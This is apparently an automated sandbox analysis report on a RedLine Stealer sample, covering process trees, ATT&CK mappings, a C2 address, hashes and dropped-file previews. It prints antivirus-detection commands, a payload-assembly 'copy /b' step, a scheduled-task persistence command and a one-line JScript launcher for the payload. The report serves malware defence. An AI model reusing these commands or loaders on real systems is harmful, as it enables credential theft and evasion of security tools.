            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 723582Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "wagemissileaffiliatesgreeting" Fisting Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Restriction + Manager + Screw + Anchor 723582\rJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\723582\Flash.pif 723582\Flash.pif 723582\rJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 15Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifProcess created: C:\Users\user\AppData\Local\Temp\723582\RegAsm.exe C:\Users\user\AppData\Local\Temp\723582\RegAsm.exeJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pif "C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pif" "C:\Users\user\AppData\Local\EduTech Dynamics\L"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A288CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_00A288CD
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A34F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_00A34F1C
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe, 00000000.00000003.2011358694.0000000002835000.00000004.00000020.00020000.00000000.sdmp, Flash.pif, 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmp, Flash.pif, 0000000B.00000003.2078132463.0000000003B8C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: Flash.pif, ApolloSphere.pifBinary or memory string: Shell_TrayWnd
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009F885B cpuid 11_2_009F885B
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A10030 GetLocalTime,__swprintf,11_2_00A10030
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A10722 GetUserNameW,11_2_00A10722
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A0416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,11_2_00A0416A
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0000000B.00000002.3256409691.000000000141A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3256254115.0000000001350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000003.3249041675.00000000030D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000003.3249083801.000000000139B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3256579902.00000000014CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000003.3248898877.0000000001351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000003.3248832355.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000003.3248740085.000000000141B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000003.3248696366.00000000030D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Flash.pif PID: 4368, type: MEMORYSTR
            Source: ApolloSphere.pifBinary or memory string: WIN_81
            Source: ApolloSphere.pifBinary or memory string: WIN_XP
            Source: ApolloSphere.pifBinary or memory string: WIN_XPe
            Source: ApolloSphere.pifBinary or memory string: WIN_VISTA
            Source: ApolloSphere.pifBinary or memory string: WIN_7
            Source: ApolloSphere.pifBinary or memory string: WIN_8
            Source: Flash.pif.2.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 4USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0000000B.00000002.3256409691.000000000141A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3256254115.0000000001350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000003.3249041675.00000000030D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000003.3249083801.000000000139B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3256579902.00000000014CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000003.3248898877.0000000001351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000003.3248832355.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000003.3248740085.000000000141B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000003.3248696366.00000000030D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Flash.pif PID: 4368, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A4696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,11_2_00A4696E
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A46E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_00A46E32
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001F696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,16_2_001F696E
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001F6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,16_2_001F6E32
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information11
            Scripting
            2
            Valid Accounts
            1
            Windows Management Instrumentation
            11
            Scripting
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            21
            Input Capture
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Native API
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Deobfuscate/Decode Files or Information
            LSASS Memory1
            Account Discovery
            Remote Desktop Protocol21
            Input Capture
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Scheduled Task/Job
            2
            Valid Accounts
            2
            Valid Accounts
            2
            Obfuscated Files or Information
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin Shares3
            Clipboard Data
            1
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCron1
            Scheduled Task/Job
            21
            Access Token Manipulation
            1
            DLL Side-Loading
            NTDS17
            System Information Discovery
            Distributed Component Object ModelInput Capture11
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
            Process Injection
            11
            Masquerading
            LSA Secrets31
            Security Software Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
            Scheduled Task/Job
            2
            Valid Accounts
            Cached Domain Credentials1
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Virtualization/Sandbox Evasion
            DCSync4
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483220 Sample: f3ba41ba0b508b0965153c1688d... Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 48 RADgSUbEiddPOZAFcUYmDkmxSjP.RADgSUbEiddPOZAFcUYmDkmxSjP 2->48 52 Found malware configuration 2->52 54 Multi AV Scanner detection for submitted file 2->54 56 Yara detected RedLine Stealer 2->56 58 7 other signatures 2->58 10 f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe 38 2->10         started        14 wscript.exe 1 2->14         started        signatures3 process4 file5 46 C:\Users\user\AppData\Local\Temp\Wallpapers, PDP-11 10->46 dropped 64 Found stalling execution ending in API Sleep call 10->64 16 cmd.exe 3 10->16         started        66 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->66 20 ApolloSphere.pif 14->20         started        signatures6 process7 file8 38 C:\Users\user\AppData\Local\...\Flash.pif, PE32 16->38 dropped 50 Drops PE files with a suspicious file extension 16->50 22 Flash.pif 5 16->22         started        26 cmd.exe 2 16->26         started        28 conhost.exe 16->28         started        30 7 other processes 16->30 signatures9 process10 file11 40 C:\Users\user\AppData\...\ApolloSphere.pif, PE32 22->40 dropped 42 C:\Users\user\AppData\...\ApolloSphere.js, ASCII 22->42 dropped 44 C:\Users\user\AppData\Local\...\RegAsm.exe, PE32 22->44 dropped 60 Drops PE files with a suspicious file extension 22->60 62 Uses schtasks.exe or at.exe to add and modify task schedules 22->62 32 schtasks.exe 1 22->32         started        34 RegAsm.exe 22->34         started        signatures12 process13 process14 36 conhost.exe 32->36         started       

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe67%ReversingLabsWin32.Trojan.Nekark
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pif7%ReversingLabs
            C:\Users\user\AppData\Local\Temp\723582\Flash.pif7%ReversingLabs
            C:\Users\user\AppData\Local\Temp\723582\RegAsm.exe0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
            https://api.ip.sb/ip0%URL Reputationsafe
            https://sectigo.com/CPS00%URL Reputationsafe
            http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
            http://ocsp.sectigo.com00%URL Reputationsafe
            http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
            http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
            88.99.151.68:72000%Avira URL Cloudsafe
            https://www.autoitscript.com/autoit3/0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            RADgSUbEiddPOZAFcUYmDkmxSjP.RADgSUbEiddPOZAFcUYmDkmxSjP
            unknown
            unknowntrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              88.99.151.68:7200true
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tf3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exefalse
              • URL Reputation: safe
              unknown
              http://www.autoitscript.com/autoit3/Jf3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe, 00000000.00000003.2017160041.000000000283A000.00000004.00000020.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.2078132463.0000000003B9A000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000000.2068027405.0000000000A99000.00000002.00000001.01000000.00000005.sdmp, ApolloSphere.pif, 00000010.00000002.3254047841.0000000000249000.00000002.00000001.01000000.00000008.sdmp, ApolloSphere.pif.11.dr, Flash.pif.2.dr, Parents.0.drfalse
              • Avira URL Cloud: safe
              unknown
              https://api.ip.sb/ipFlash.pif, 0000000B.00000002.3256409691.000000000141A000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000002.3256254115.0000000001350000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.3249041675.00000000030D4000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.3249083801.000000000139B000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000002.3256579902.00000000014CB000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.3248898877.0000000001351000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.3248832355.00000000042DB000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://sectigo.com/CPS0f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exefalse
              • URL Reputation: safe
              unknown
              http://nsis.sf.net/NSIS_ErrorErrorf3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exefalse
              • URL Reputation: safe
              unknown
              http://ocsp.sectigo.com0f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exefalse
              • URL Reputation: safe
              unknown
              https://www.autoitscript.com/autoit3/f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe, 00000000.00000003.2025611009.0000000002835000.00000004.00000020.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.2078132463.0000000003B9A000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000002.3257234453.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.3247044390.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, Confidentiality.0.dr, ApolloSphere.pif.11.dr, Flash.pif.2.drfalse
              • Avira URL Cloud: safe
              unknown
              http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exefalse
              • URL Reputation: safe
              unknown
              No contacted IP infos
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1483220
              Start date and time:2024-07-26 21:11:08 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 8m 2s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:21
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@30/37@2/0
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 98
              • Number of non-executed functions: 296
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtSetInformationFile calls found.
              • VT rate limit hit for: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
              TimeTypeDescription
              15:11:58API Interceptor1x Sleep call for process: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe modified
              15:12:03API Interceptor3641x Sleep call for process: Flash.pif modified
              15:12:09API Interceptor2805x Sleep call for process: ApolloSphere.pif modified
              21:12:04Task SchedulerRun new task: ApolloSphere path: wscript s>//B "C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.js"
              No context
              No context
              No context
              No context
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.piffile.exeGet hashmaliciousVidarBrowse
                NB4EASbynx.msiGet hashmaliciousLummaCBrowse
                  LisectAVT_2403002A_117.exeGet hashmaliciousRedLineBrowse
                    wxNXR3EdaH.msiGet hashmaliciousLummaCBrowse
                      main.exeGet hashmaliciousUnknownBrowse
                        main.exeGet hashmaliciousUnknownBrowse
                          main.exeGet hashmaliciousUnknownBrowse
                            main.exeGet hashmaliciousUnknownBrowse
                              main.exeGet hashmaliciousUnknownBrowse
                                lSmb6nDsrC.exeGet hashmaliciousSmokeLoaderBrowse
                                  C:\Users\user\AppData\Local\Temp\723582\Flash.piffile.exeGet hashmaliciousVidarBrowse
                                    NB4EASbynx.msiGet hashmaliciousLummaCBrowse
                                      LisectAVT_2403002A_117.exeGet hashmaliciousRedLineBrowse
                                        wxNXR3EdaH.msiGet hashmaliciousLummaCBrowse
                                          main.exeGet hashmaliciousUnknownBrowse
                                            main.exeGet hashmaliciousUnknownBrowse
                                              main.exeGet hashmaliciousUnknownBrowse
                                                main.exeGet hashmaliciousUnknownBrowse
                                                  main.exeGet hashmaliciousUnknownBrowse
                                                    lSmb6nDsrC.exeGet hashmaliciousSmokeLoaderBrowse
                                                      Process:C:\Users\user\AppData\Local\Temp\723582\Flash.pif
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):180
                                                      Entropy (8bit):4.782326013424989
                                                      Encrypted:false
                                                      SSDEEP:3:RiMIpGXJO9obdPHo55wWAX+aJp6/h4EkD5gmx9hJSQI585uWAX+aJp6/h4EkD5gB:RiJuOybJHonwWDaJ0/hJkDvHC58wWDaK
                                                      MD5:7180545E35CE4A1FD484CF07C33BDF26
                                                      SHA1:C1B6E3B39E5E3321D1C67948C985A6D488D6BE7F
                                                      SHA-256:695F050DA02ECC97D7D31DA736758D3CBD3C6246A0FA4DAA960922F44508E529
                                                      SHA-512:48809DCB5DFA196522E532C79D0ABAF3DD67BA576B1CC8101E4B8421DE7FF5CA135D2EEABF9B31C5A02BD67644A22A36B998909E51CFF7869302E50ED9829994
                                                      Malicious:true
                                                      Preview:new ActiveXObject("Wscript.Sh" + "ell").Exec("\"C:\\Users\\user\\AppData\\Local\\EduTech Dynamics\\ApolloSphere.pif\" \"C:\\Users\\user\\AppData\\Local\\EduTech Dynamics\\L\"")
                                                      Process:C:\Users\user\AppData\Local\Temp\723582\Flash.pif
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):893608
                                                      Entropy (8bit):6.620254876639106
                                                      Encrypted:false
                                                      SSDEEP:12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
                                                      MD5:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                      SHA1:F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
                                                      SHA-256:865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
                                                      SHA-512:57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 7%
                                                      Joe Sandbox View:
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: NB4EASbynx.msi, Detection: malicious, Browse
                                                      • Filename: LisectAVT_2403002A_117.exe, Detection: malicious, Browse
                                                      • Filename: wxNXR3EdaH.msi, Detection: malicious, Browse
                                                      • Filename: main.exe, Detection: malicious, Browse
                                                      • Filename: main.exe, Detection: malicious, Browse
                                                      • Filename: main.exe, Detection: malicious, Browse
                                                      • Filename: main.exe, Detection: malicious, Browse
                                                      • Filename: main.exe, Detection: malicious, Browse
                                                      • Filename: lSmb6nDsrC.exe, Detection: malicious, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\AppData\Local\Temp\723582\Flash.pif
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):400382
                                                      Entropy (8bit):7.999557196070158
                                                      Encrypted:true
                                                      SSDEEP:12288:PKNEkDMXn1f8OU+IrrA+eh45xwkXF5rBoZH4S:CNE0MlkOU5rApOxw8oZl
                                                      MD5:B786563F77CB34317241685E18A73F01
                                                      SHA1:53991C917BCA0F332D04B1AFAEB662DD74733414
                                                      SHA-256:873AF222D88CF19A1E39DE1AEFC5DEA1D721F917807F1BAFA7F75669787F8D06
                                                      SHA-512:204DCDD2D6159EB9EE48B05D90B3AC054631F478114862056B449A7E7001E98AA9A448AAB43733DDA911D7D093AD859002E0D9F07A372E0BEB1225E594C52DED
                                                      Malicious:false
                                                      Preview:G.....Pf._....IG.-..M"...c-.*.g...9Y../v........L.L...p....#|.S...[K.?6.^.^9.1Uo.I.0.....RLr.R.X.(.Y...N...6.....3.#.<!.....].Y...C../....P..G...U.q..h......T..9F.Jk..>..V/..T.g20.b.X....W.o..|.7K....r."....QP+_...Q..6....J.H.W..I.YH...o......C...'.8.}......u9vpI.x....z.No...(.MC.0..5l>...uR.eV...E3\k.V....1OF.yaB....{...&.:....R;N(.J.j-. =..BC...3..fZ*24....4.s_>...6.YNf....?..8.:b...].iR...E.0n...>..~......K..8.i..............D..e...uw...y....sH..PLos7.e...C...P.<<....!....ql.C..k;...o........6..i.VM...L..\.|.'..wf$..g...*_.5.<.H.._.."U....d. ....N...!1.&7?5d.(_]s.m.veI..d.rv.Z.N...N..#aj.M...a.a2.9(.q._.\..].G.K!..p.Io...F..s...y.&.1x.C.S.mgi.h@.R.....v....\..l..[......Q-..G3....m"....7.........|..!m.{..(......9.....$3v...:....yV...6.s'EA.*.x......xGCI.|.(...Wx....wJ.}..n.3g.....W^...0...k...?.....J.U..I!D...y.Z5tc..)~....pk'Q.`<VC.........X.l..W..^.}.$?:...>~.#..,...2b.\.|C...2m...w?8.u.....\5.....g..!..o......+.]..9e(......./?...
                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:modified
                                                      Size (bytes):893608
                                                      Entropy (8bit):6.620254876639106
                                                      Encrypted:false
                                                      SSDEEP:12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
                                                      MD5:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                      SHA1:F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
                                                      SHA-256:865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
                                                      SHA-512:57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 7%
                                                      Joe Sandbox View:
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: NB4EASbynx.msi, Detection: malicious, Browse
                                                      • Filename: LisectAVT_2403002A_117.exe, Detection: malicious, Browse
                                                      • Filename: wxNXR3EdaH.msi, Detection: malicious, Browse
                                                      • Filename: main.exe, Detection: malicious, Browse
                                                      • Filename: main.exe, Detection: malicious, Browse
                                                      • Filename: main.exe, Detection: malicious, Browse
                                                      • Filename: main.exe, Detection: malicious, Browse
                                                      • Filename: main.exe, Detection: malicious, Browse
                                                      • Filename: lSmb6nDsrC.exe, Detection: malicious, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\AppData\Local\Temp\723582\Flash.pif
                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):65440
                                                      Entropy (8bit):6.049806962480652
                                                      Encrypted:false
                                                      SSDEEP:768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
                                                      MD5:0D5DF43AF2916F47D00C1573797C1A13
                                                      SHA1:230AB5559E806574D26B4C20847C368ED55483B0
                                                      SHA-256:C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
                                                      SHA-512:F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
